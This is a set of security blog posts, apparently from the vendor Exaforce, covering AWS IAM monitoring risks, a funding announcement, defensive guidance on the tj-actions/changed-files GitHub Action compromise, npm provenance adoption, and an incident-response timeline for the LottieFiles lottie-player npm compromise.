AWS IAM user X accessing multiple S3 buckets from processes running in factories located in different locations.

Threat Vectors and Monitoring Recommendations

To mitigate the risks associated with such a setup, focus on continuous threat monitoring with these priority measures:

  1. IP Allow-Listing
  • Define and enforce an allowed list of IP addresses for each factory.
  • Alert on any access attempts from unauthorized IPs.
  • Tool: AWS using policy conditions. Below is an example to deny everything but CIDR 192.0.2.0/24, 203.0.113.0/24
AWS IAM policy to deny all requests unless requests originate from specified IP address ranges.

2. Resource Access Monitoring

  • Continuously monitor and log which resources the IAM user accesses.
  • Correlate access patterns with expected behavior for each factory or task.
  • Tool: SIEM platforms integrated with cloudtrail logs.

3. Regular Credential Rotation

  • Implement strict policies to rotate long term credentials periodically.
  • Automate token rotation and integrate alerts for unusual rotation delays.

4. User Agent and Device Validation

  • Identify and allow only a predefined list of acceptable user agents (e.g., specific OS versions like Linux and Windows Server) for each use case.
  • Flag anomalies such as access from unexpected operating systems (e.g., macOS when not approved).
  • Tool: SIEM platforms to co-related EDR and AWS cloudtrail logs and generate detections

Use Case: Long-Term IAM User Credentials in GitHub Pipelines

One of our SaaS provider partners is using long-term AWS IAM user credentials directly into their GitHub Actions CI/CD pipelines as static GitHub secrets, allowing automation scripts to deploy services into AWS. This practice poses significant security risks; credentials stored in CI/CD pipelines can easily become exposed through accidental leaks or external breaches—as seen recently with Sisense (April 2024) and TinaCMS (Dec 2024)—enabling attackers to gain unauthorized cloud access, escalate privileges, and exfiltrate sensitive data.

GitHub pipelines using long-term AWS IAM user access keys.
GitHub pipelines using long-term AWS IAM user access keys.

Threat Vectors and Monitoring Recommendations

To monitor and detect threats associated with this anti-pattern, consider these prioritized measures:

1. Credential Usage Monitoring

  • Continuously monitor IAM user activity and set alerts for any anomalous actions, such as unusual access patterns, region shifts, or privilege escalation attempts.
  • Tool: SIEM platform integrated with cloudtrail logs.

2. Regular Credential Rotation

  • Implement strict policies to rotate long term credentials periodically.
  • Automate token rotation and integrate alerts for unusual rotation delays.

Remediation: Short-lived Credentials via OIDC

Transition to GitHub Actions’ OpenID Connect (OIDC) integration, enabling temporary credentials instead of embedding long-term keys, minimizing risk exposure.

Ineffective Use of Permission Sets in Multi-Account Environments

A cloud-first SaaS provider is misusing AWS permission sets by provisioning direct access in the management accounts where sensitive permission sets and policies are defined instead of correctly provisioning them across member accounts. This setup complicates policy management and leaves the management account largely unmonitored, creating blind spots where identity threats can emerge before affecting production or staging.

Complex IAM access management across multiple accounts.

Threat Vectors and Monitoring Recommendations

1. Monitoring Management Account Activity

  • Monitor all IAM and policy changes in the management account using AWS Tools: SIEM Tool integrated with CloudTrail logs. Detections should trigger alerts on any modifications to permission sets or cross-account role assumptions.

2. Misconfigured Trust Relationships:

  • Audit and continuously validate trust policies for cross-account roles to ensure they only allow intended access.
  • Tools: AWS Config rules to flag deviations from approved configurations.

3. Policy Drift and Unauthorized Changes:

  • Implement automated periodic reviews of permission sets and associated IAM roles. This ensures that any drift or unauthorized changes are quickly detected and remediated.
  • Tools: SIEM Tool integrated with CloudTrail logs.

Root User Access Delegated to a Third Party

Delegating root user access to a third party for managing AWS billing and administration may seem low-risk, but it leaves the company without direct oversight of its highest-privilege account. When the root credentials including long-term passwords and MFA tokens are controlled externally, the risk escalates dramatically: if the third party is compromised or mismanages their controls, attackers could gain unrestricted access to the entire AWS environment.

Third party with root user access to your AWS accounts.

Threat Vectors and Monitoring Recommendations

  1. Monitoring Unauthorized Root Activity
  • Monitor all root user actions via CloudTrail and SIEM alerts for any anomalous behavior.
  • Tools: SIEM Tool integrated with CloudTrail logs.
  1. Third-Party Compromise
  • Regularly audit third-party access and security posture
  • Tool: Identity access management tool.

Remediation: Centralized root access

Remediate by removing root access and migrating to centrally manage root access using AssumeRoot, which issues short-term credentials for privileged tasks.

Contact us to learn how Exaforce leverages Exabots to address these challenges.

April 17, 2025

Reimagining the SOC: Humans + AI bots = Better, faster, cheaper security & operations

Announcing our $75M Series A to fuel our mission

Attack surfaces continue to grow as enterprises widen their digital footprint and AI goes mainstream into various aspects of the business. Meanwhile, CISOs and CIOs continue to struggle with their defenses – they all want their security operations centers (SOC) to be more efficacious, productive, and scalable.

A few years back, some of us were at F5 and Palo Alto Networks defending mission-critical applications and cloud services for global banks, major social media networks, and video collaboration platforms. We saw advanced cyber threats — from nation-states to organized crime — constantly probing our customer's’ defenses. Meeting strict 24x7x365 SLAs with limited talent was an uphill battle and our SOC teams worked tirelessly. No matter how good we got, it felt like we were always reacting, never truly getting ahead.

Simultaneously, other members of our founding team were at Google pioneering large language models (LLMs).Their main focus was on improving the quality and consistency of output from these frontier models. AI showed massive promise to automate human work, but suffered from a few inherent flaws — long-short term memory, consistency of reasoning, cost of analyzing a very large data set, etc. 

Together, we reached the same conclusion that the problems of security and operations cannot be solved by hiring more people or building a bigger foundation model or a smaller security-specific model — the solution will require grounds-up re-thinking! 

The magical combination: Humans + Bots

We founded Exaforce with a singular goal: 10X speed-up for tasks done by humans.  And nowhere is this work more complex than in enterprise security and operations. We have made great strides towards this goal using our task-specific AI agents called “Exabots” and advanced data exploration. We think of this platform as an Agentic SOC Platform. Our goal with Exabots from conception has been to help automate difficult tasks, not the simple or low-skill tasks that you see in demos. 

For the last 18 months, we have been working with our design partners to train Exabots to help SOC analysts, detection engineers, and threat hunters. Exabots augment them to auto-triage alerts, detect breaches in critical cloud services, and simplify the process of threat hunting. We are seeing up to 60X speed-up in day-to-day tasks alongside dramatic improvement in efficacy and auditability. 

Our light-bulb moment: Multi-Model AI Engine

Our ex-Google team knew from day one that no foundation model will be able to deliver consistency of reasoning needed for human-grade analysis of threat alerts or do the analysis of all runtime events while meeting the cost points needed to detect breaches. As a result, we had to innovate on a brand new approach by building a new multi-model AI engine that combines three different types of AI models that we have been developing for the last 18 months:

  • Semantic Model: imbibes human-grade understanding of runtime events/logs, cloud configuration, code, identity data, and threat feeds. 
  • Behavioral Model: that learns patterns of actions, applications, data, resources, identities (humans and machines), locations, etc. 
  • Knowledge Model: LLM that performs reasoning on this data, executes dynamically generated workflows, analyzes historical tickets in ITSM (eg. Jira, ServiceNow).   

Together, these models work in perfect harmony to overcome the inherent flaws of a LLM-only approach (long-short term memory, consistency of reasoning, cost of reasoning over a very large data set). This AI engine can analyze all the data at cost points that are unmatched in the industry and yet deliver human-grade analysis!

Backed by leading investors: $75 Million in Series A

Today, we’re thrilled to announce $75 million in Series A funding, led by Khosla Ventures and Mayfield, alongside Thomvest, Touring Capital, and others who share our belief in augmenting today’s hard working cyber professionals with AI that works consistently and reliably! 

This investment allows us to scale our investment in R&D to refine our multi-model AI engine, train Exabots to perform more and more complex tasks, and onboard more design partners eager to see how an agentic SOC can transform their security operations. 

A glimpse into the future of SOC

With Exaforce, our design partners are already seeing multitude of benefits for their SOC teams: 

  • Higher Efficacy: much higher consistency and quality in investigation of complex threats than their existing in-house SOC or external partners (MSSP and MDR)
  • Better Productivity: much faster in detecting and responding to complex threats to their cloud services compared to existing SIEMs/CDR solutions.  
  • Cheaper to scale: automated handling of challenging and tedious tasks (data collection, analysis, user and manager confirmations, ticket analysis, etc) along with the ability to scale defense on-demand without adding headcount or new contracts with MDR/MSSP 

See what the Wall Street Journal has to say about our funding! 

What’s next

Though we’re very excited about launching the company, our journey is just beginning! We’ll continue collaborating with more design partners to expand coverage, refine AI workflows, and ensure that humans always remain in control. Our goal is to build a SOC where AI handles the busywork and humans focus on true threats — creating a security environment that is truly more consistent in results, faster in response, and lower in TCO.

If you want a SOC that is composed of superhuman analysts, detection engineers, or threat hunters - request a demo to learn more. Together, we can build the future of the SOC!

March 16, 2025

Safeguarding against Github Actions(tj-actions/changed-files) compromise

How users can detect, prevent, recover from supply chain threats with Exaforce

Since March 14th, 2025, Exaforce has been very busy helping our design partners overcome a critical attack to the software supply chain through Github. In the last 6 months, this is a second major attack experienced by our design partners to their cloud deployments and we are grateful to have delivered value to them.

What Happened?

On March 14, 2025, security researchers detected unusual activity in the widely used GitHub Action tj-actions/changed-files. This action, primarily designed to list changed files in repositories, suffered a sophisticated supply chain compromise. Attackers injected malicious code into nearly all tagged versions through a malicious commit (0e58ed8671d6b60d0890c21b07f8835ace038e67).

The malicious payload was a base64-encoded script designed to print sensitive CI/CD secrets — including API keys, tokens, and credentials — directly into publicly accessible GitHub Actions build logs. Public repositories became especially vulnerable, potentially allowing anyone to harvest these exposed secrets.

Attackers retroactively updated version tags to point to the compromised commit, meaning even pinned tagged versions (if not pinned by specific commit SHAs) were vulnerable. While the script didn’t exfiltrate secrets to external servers, it exposed them publicly, leading to the critical vulnerability CVE-2025–30066.

How We Helped Our Design Partners

Leveraging the Exaforce Platform, we swiftly identified all customer repositories and workflows using the compromised action. Our analysis included:

Quickly querying repositories and workflows across customer accounts.

Identifying affected secrets used by compromised workflows.

  • Directly communicating these findings and recommended remediation actions to affected customers.

Our security team proactively informed customers detailing specific impacted workflows and guiding them to rotate compromised secrets immediately.

What Should You Do?

Use the below search url to look for impacted repositories. Replace the string <Your Org Name> with your github org name.

https://github.com/search?q=org%3A<Your Org Name>+tj-actions%2Fchanged-files+&type=issues

If your workflows include tj-actions/changed-files, take immediate action.

  • Stop Using the Action Immediately: Remove all instances from your workflows across all branches.
  • Review Logs: Inspect GitHub Actions logs from March 14–15, 2025, for exposed secrets. Assume all logged secrets are compromised, especially in public repositories.
  • Rotate Secrets: Immediately rotate all potentially leaked credentials — API keys, tokens, passwords.
  • Switch to Alternatives: Use secure alternatives or inline file-change detection logic until a verified safe version becomes available.

Lessons Learned

This breach highlights critical vulnerabilities inherent in software supply chains. Dependence on third-party actions requires stringent security practices:

  • Pin your third party GitHub Actions to commit SHAs instead of versions
  • Wherever possible, rather than relying on a third-party action you can use native Git commands within your workflow. This avoids external dependencies, reducing supply chain risks.
  • Restrict permissions via minimally scoped tokens (like GITHUB_TOKEN).
  • Implement continuous runtime monitoring including enabling audit logs, action logs, and capturing detailed resource information to promptly detect anomalous behavior and facilitate comprehensive investigations.

By adopting these best practices, organizations can significantly reduce the risk posed by compromised third-party software components.

Reach out to us contact@exaforce.com if you’d like to understand how we protect GitHub and other data sources from supply chain compromises and other threats.

November 6, 2024

Npm provenance: bridging the missing security layer in JavaScript libraries

Why verifying package origins is crucial for secure JavaScript applications

The recent security incident involving the popular lottie-player library once again highlighted the fragility of the NPM ecosystem’s security. While NPM provides robust security features like provenance attestation, many of the most downloaded packages aren’t utilising these critical security measures.

What is NPM Provenance?

NPM provenance is a security feature that creates a verifiable connection between a published package and its source code repository introduced last year. When enabled, it provides cryptographic proof that a package was built from a specific GitHub repository commit using GitHub Actions or Gitlab runners. This helps prevent supply chain attacks where malicious actors could publish compromised versions of popular packages. However, it’s important to note that this security relies on the integrity of your build environment itself — if your GitHub/GitLab account or CI/CD pipeline is compromised, the provenance attestation could still be generated for malicious code. Therefore, securing your source control and CI/CD infrastructure with strong access controls, audit logging, and regular security reviews remains critical.

The Current State of Popular NPM Packages

Let’s examine some of the most downloaded NPM packages and their provenance status:

Among the 2,000 most downloaded packages on jsDelivr, 205 packages have a public GitHub repository and directly publish to npm using GitHub Workflows. However, only 26 (12.6%) of these packages have enabled provenance — a security feature that verifies where and how a package was built. Making this incremental change to their GitHub workflows would be a significant security improvement for the entire community at large.

Critical Gaps in NPM’s Security Model

Server-Side Limitations

The NPM registry currently lacks critical server-side enforcement mechanisms:

1. No Mandatory Provenance

  • Packages can be published without any attestation
  • No way to enforce provenance requirements for specific packages or organizations
  • Registry accepts packages with or without verification

2. Missing Policy Controls

  • Organizations cannot set requirements for package publishing
  • No ability to enforce provenance for specific package names or patterns similar to git branch protection
  • No automated verification of build source authenticity

3. Version Control

  • No mechanism to prevent version updates without matching provenance
  • Cannot enforce stricter requirements for major version updates

Client-Side Verification Gaps

npm/yarn client tools also lack essential security controls:

1. Installation Process

2. Missing security Features

  • No built-in flags to require provenance
  • Cannot enforce organization-wide attestation policies
  • No way to verify single package attestation

3. Package.json Limitations

The Lottie-Player Incident

The recent compromise of the lottie-player library serves as a stark reminder of what can go wrong. The attack timeline:

  1. Attackers gained access to the maintainer’s NPM account
  2. Published a malicious version of the package
  3. Users automatically received the compromised version through unpinned dependency updates and direct CDN links
  4. Malicious code executed on affected systems

Had the provenance attestation been enforced at either the registry or client level, this attack could have been prevented.

Why Aren’t More Packages Using Provenance?

Several factors contribute to the low adoption of NPM provenance:

  1. Awareness Gap: Many maintainers aren’t familiar with the feature
  2. Implementation Overhead: Requires GitHub Actions workflow modifications
  3. Legacy Systems: Existing build pipelines may need significant updates
  4. False Sense of Security: Reliance on other security measures like 2FA
  5. Lack of Enforcement: No pressure to implement due to missing registry requirements

To enable provenance for your NPM packages:

<script src="https://gist.github.com/pupapaik/9cc17e02a0b204281a5c14d8bc56aabb#file-npm-publish-workfow-yaml.js"></script>

Or do it in package.json in

<script src="https://gist.github.com/pupapaik/fc640fbadf4581ad92b2143c7391e791#file-package-provenance-json.js"></script>

Package Provenance check

The npm command audit can check the integrity and authenticity of packages, but it doesn’t allow you to verify individual packages — only all packages in a project at once.

NPM with invalid attestations

Since the npm CLI doesn’t provide an easy way to do this, I wrote a simple script to check the integrity and attestation of individual packages. This script makes it straightforward to validate each package.

This script can be used in a GitHub Workflow on the client side or as a monitoring tool to continuously check the attestation of upstream packages.

Client-Side Script Integrity Verification

While NPM provenance helps secure your package ecosystem, web applications loading JavaScript directly via CDN links need additional security measures. The Subresource Integrity (SRI) mechanism provides cryptographic verification for externally loaded resources. The Lottie-player attack was particularly devastating due to three common but dangerous practices:

1. Using latest tag

2. Missing integrity check

3. No Fallback Strategy

SRI works by providing a cryptographic hash of the expected file content. The browser:

  1. Downloads the resource
  2. Calculates its hash
  3. Compares it with the provided integrity value
  4. Blocks execution if there’s a mismatch

When integrity check verification fails, the browser does not allow javascript executing with the sample error

Recommendations for the Ecosystem

1. Package Maintainers:

  • Enable provenance attestation immediately
  • Document provenance status in README files
  • Use GitHub Actions for automated, verified builds

2. Package Users:

  • Check provenance status before adding new dependencies
  • Prefer packages with enabled provenance. Check websites such as TrustyPkg to understand its trustworthiness based on activity, provenance, and more
  • Monitor existing dependencies for provenance adoption

3. Platform Providers:

  • Make provenance status more visible in NPM registry UI
  • Provide tools for bulk provenance verification
  • Consider making provenance mandatory for high-impact packages
  • Implement server-side enforcement mechanisms
  • Add client-side verification tools

4. NPM Registry

  • Add organization-level provenance requirements
  • Implement mandatory attestation for popular packages
  • Provide API endpoints for provenance verification
  • Provide package approval process / workflow

Conclusion

The security of the NPM ecosystem affects millions of applications worldwide. The current lack of enforcement mechanisms at both the registry and client levels creates a significant security risks. While provenance attestation is available, the inability to enforce it systematically leaves the ecosystem vulnerable to supply chain attacks.

The NPM team should prioritize implementing both server-side and client-side enforcement mechanisms. Until then, the community must rely on manual verification and best practices. Package maintainers should enable provenance attestation immediately, while users should demand better security controls and verification tools.

Only by working together to improve NPM’s infrastructure can we create a more secure JavaScript ecosystem. At ExaForce, we’re committed to taking the first step by helping open-source libraries adopt provenance attestation in their publishing process.

References

[1] Resolution of Security Incident with @lottiefiles/lottie-player Package

[2] Supply Chain Security Incident: Analysis of the LottieFiles NPM Package Compromise

[3] TrustyPkg Lottie verification database for developers to consume secure open source libraries

November 1, 2024

Exaforce’s response to the LottieFiles npm package compromise

Analyzing the supply chain attack and steps taken to secure the ecosystem

October 30th, 2024, Exaforce’s Incident Response team was engaged by LottieFiles following the discovery of a sophisticated supply chain attack targeting their popular lottie-player NPM package.

  • The incident involved the compromise of a package maintainer’s credentials through a phishing attack, resulting in the distribution of malicious code designed to target crypto currency wallets used in the DeFi and Web3 community.
  • LottieFiles moved rapidly and were jointly able to contain the attack within an hour, minimizing potential impact on the package’s extensive user base, estimated at over 11 million daily active users.
  • In the entire process, LottieFiles demonstrated commendable speed and commitment to its community of users.

Exaforce is committed to ensuring LottieFiles is able to serve its community with the trust it has gained over the years. Key actions taken:

  • Helping the team at LottieFiles implement NPM package provenance attestation, providing cryptographic verification of package origins, build processes, continuous detection & response.
  • Continue being actively engaged with LottieFiles to strengthen their security posture and ongoing monitoring of critical systems.
  • A follow up post incident blog where we will share additional learnings and suggestions on best practices will be made available.

Official details of the incident report here:

About LottieFiles and NPM Packages

LottieFiles has revolutionized web animation by providing developers with tools to implement lightweight, scalable animations across platforms. At the heart of their ecosystem lies the lottie-player NPM package, which serves over 9 million lifetime users and averages 94,000 weekly downloads. NPM packages form the backbone of modern JavaScript development, acting as building blocks that developers use to construct applications efficiently and securely. In the software supply chain, these packages represent both incredible value and potential vulnerability points, making their security paramount.

Attack Overview and Impact

The incident began with a sophisticated phishing campaign targeting LottieFiles developers. The attacker (email notify.npmjs@pm.me) sent a carefully crafted phishing email to a developer’s private Gmail account that was registered with NPM with an invitation to collaborate on the @lottiefiles/jlottie npm package. Through this social engineering attack, the threat actor successfully harvested both NPM credentials and two-factor authentication codes from the targeted developer.

Using compromised credentials, the attacker executed their campaign on October 30th, 2024, between 19:00 UTC and 20:00 UTC, publishing three malicious versions of the lottie-player package (2.0.5, 2.0.6, and 2.0.7) directly to the NPM registry. This manual publication bypassed LottieFiles’ standard GitHub Actions deployment pipeline.

The attack’s distribution mechanism proved particularly effective due to the nature of modern web development practices. The compromised versions rapidly propagated through major Content Delivery Networks (CDNs), affecting websites configured to automatically pull the latest library version. This auto-update feature, typically a security benefit, became an attack vector that significantly amplified the incident’s reach.

Important Lessons Learned

In the process of handling this incident we’ve come to the conclusion that the current NPM package distribution model presents significant security challenges that should concern enterprise organizations relying on it for their JavaScript dependencies. While Github (after its acquisition of NPM and subsequent deprecation of NPM Enterprise) is promoting a migration strategy, there are critical security gaps with existing npmjs.com offerings — lack of SSO for users, no logs for upstreaming of packages or usage of packages, limited integrity checks, lack of OIDC support for automated systems, and no controls on distribution through CDNs. These limitations collectively represent a substantial security deficit in what has become the backbone of modern JavaScript development, potentially exposing organizations to supply chain attacks and compliance issues. We, along with Lottie Files will work with npmjs and Github to improve the current gaps in such a vital software supply chain.

Incident Detection and Response Timeline

The incident was first reported through LottieFiles’ community website at approximately 19:24 UTC on October 30th, when users began noticing suspicious wallet connection prompts. Exaforce’s incident response team, working in conjunction with LottieFiles, implemented immediate countermeasures:

  • October 30th, 19:24 UTC: Initial detection and report
  • October 30th, 19:30 UTC: Impacted package versions (2.0.5, 2.0.6, 2.0.7) deleted
  • October 30th, 19:35 UTC: Revocation of compromised NPM access tokens
  • October 30th, 19:58 UTC: Publication of clean version 2.0.8
  • October 31st, 02:35 UTC: Removal of affected developer’s NPM access
  • October 31st, 02:40 UTC: Access of individual developers to NPM repositories revoked
  • October 31st, 02:45 UTC: All NPM keys as well as other systems had their keys revoked and NPM automations suspended
  • October 31st, 03:30 UTC: Laptop in question quarantined for further post-incident analysis
  • October 31st, 03:35 UTC: Begin forensics on the compromised laptop
  • October 31st, 03:55 UTC: Coordination with major CDN providers to purge compromised files
  • October 31st, 04:00 UTC: First official X (Twitter) post by LottieFiles
  • October 31st, 20:06 UTC: All infected files removed from downstream CDNs (cdnjs.com, unpkg.com) with the help of the community operators
  • November 1st, 01:59 UTC: Second official update on X (Twitter) post by LottieFiles

Hardening Effort Towards a More Secure LottieFiles

In response to this incident, we are working with Lottie Files to implement comprehensive security improvements across their infrastructure. Key measures include:

  1. Implementation of NPM package provenance attestation and continuous monitoring of this, providing cryptographic verification of package origins and build processes. This ensures that packages are built and published through verified GitHub workflows only, eliminating the risk of direct human publishing.
  2. Understanding the posture of human and machine identities in critical systems. Machine identities, including credentials, are the most common threat vector in the cloud today. Gaining visibility into these identities, how they are being used and by whom is critical to establishing a strong cloud security posture.
  3. Real-time monitoring and threat detection coverage across all critical systems leveraging a combination of Exaforce AI-BOTs and our Managed Cloud Detection & Response service.

Stay tuned for a follow up where we will share our learnings helping Lottie establish industry leading Security Engineering and Operations by augmenting their existing teams with task specific AI bots. Only by working together to improve NPM’s infrastructure can we create a more secure JavaScript ecosystem. At Exaforce, we’re committed to taking the first step by helping open-source libraries adopt provenance attestation in their publishing process.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Explore how Exaforce can help transform your security operations

See what Exabots + humans can do for you